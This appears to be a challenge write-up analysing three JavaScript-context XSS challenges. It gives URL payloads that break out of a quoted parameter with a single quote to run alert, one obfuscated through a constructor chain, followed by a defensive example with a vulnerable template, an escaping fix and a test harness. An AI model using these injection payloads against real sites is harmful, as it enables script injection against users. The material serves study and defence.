SecProject WebAppSec: XSS Analysis, Part 1 (Script Security)

There are three challenges in total, in increasing order of difficulty. Inside a JS function, if a variable can carry a single quote without it being escaped or filtered, the whole function can be closed off, and the remaining content is then executed directly as JS code. In some cases, though, the variable is used several times, which makes closing the function a good deal harder. The challenges and some of the answers are analyzed briefly here, as a way to learn the various XSS techniques. After reading them, you realize just how ...

sdl.me/challenge1/xss1/JsChallenge1.asp?input1=111&input2=222&input3=333

URL-encoded:
sdl.me/challenge1/xss1/JsChallenge1.asp?input1=111&input2=222%27%29a}alert%2811%29;/*&input3=333*/function%20c%28%29{if%280%29{//

Decoded:
sdl.me/challenge1/xss1/JsChallenge1.asp?input1=111&input2=222')a}alert(11);/*&input3=333*/function c(){if(0){//

URL-encoded:
sdl.me/challenge1/xss1/JsChallenge1.asp?input1=test1&input2=2%27%29{}}%20try{/*&input3=1*///%27}finally{%280%29[%27constructor%27][%27constructor%27]%28%27\x61lert\x28/superevr/%29%27%29%28%29};{{//

Decoded:
sdl.me/challenge1/xss1/JsChallenge1.asp?input1=test1&input2=2'){}} try{/*&input3=1*///'}finally{(0)['constructor']['constructor']('\x61lert\x28/superevr/)')()};{{//

sdl.me/challenge1/xss1/JsChallenge1.asp?input1=a&input2=%27...
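
The root cause described in the introduction, a parameter placed between single quotes in generated JS without escaping, is shown here next to its fix as an added example. This is not the challenge page's code: the `show`/`store` template, the function names and the `O'Brien` value are assumptions made for illustration, and the only value taken from this page is the `input2` string of the first encoded URL.

```javascript
// Added example: constructed template and names, not the challenge page's source.

// Encode a value for use inside a quoted JS string literal in an inline script.
// Everything outside a small allowlist becomes \uXXXX, so quotes, brackets,
// slashes, backslashes, line breaks and "<" cannot end the literal or the script block.
function escapeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 _.,-]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Vulnerable pattern: the parameter is pasted between the quotes as-is.
function renderVulnerable(input2) {
  return "function show(){ return store('" + input2 + "'); }";
}

// Hardened pattern: same template, value encoded for the JS string context.
function renderHardened(input2) {
  return "function show(){ return store('" + escapeJsString(input2) + "'); }";
}

// Compile and run a generated script with stub functions, recording what happened.
function run(script) {
  const seen = { stored: [], alerts: 0, error: null };
  try {
    const fn = new Function('store', 'alert', script + '\nreturn show();');
    fn((v) => { seen.stored.push(v); return v; }, () => { seen.alerts += 1; });
  } catch (e) {
    seen.error = e.name;
  }
  return seen;
}

// A harmless value containing a quote already changes the program's structure.
const benign = "O'Brien";
// input2 from the first encoded URL on this page, URL-decoded.
const fromPage = decodeURIComponent('222%27%29a}alert%2811%29;/*');

console.log(run(renderVulnerable(benign)));  // error: 'SyntaxError', nothing stored
console.log(run(renderHardened(benign)));    // stored: ["O'Brien"], no error
console.log(run(renderHardened(fromPage)));  // stored: the raw text, alerts: 0
```

A value that breaks the generated script merely by containing a quote is the signal to look for in testing: it means the parameter is being parsed as code rather than data.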